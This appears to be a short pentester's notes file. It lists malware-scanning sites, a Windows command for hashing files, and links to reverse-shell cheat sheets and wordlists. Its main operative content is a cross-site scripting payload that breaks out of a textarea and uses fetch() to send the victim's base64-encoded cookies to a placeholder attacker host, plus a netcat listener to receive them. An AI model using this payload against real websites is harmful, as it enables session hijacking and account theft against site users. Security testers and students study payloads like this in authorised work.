https://metadefender.com/
https://talosintelligence.com/
https://www.virustotal.com/gui/home/upload
PS: Obtain SHA256 under Windows
#CertUtil -hashfile [FILENAME] SHA256
https://metadefender.com/
https://talosintelligence.com/
https://www.virustotal.com/gui/home/upload
PS: Obtain SHA256 under Windows
#CertUtil -hashfile [FILENAME] SHA256
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
https://web.archive.org/web/20200901140719/http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
https://github.com/danielmiessler/SecLists
XSS Payload:
</textarea><script>fetch('http://URL_OR_IP:PORT_NUMBER?cookie=' + btoa(document.cookie) );</script>
Listening side:
#nc -nvlp PORT_NUMBER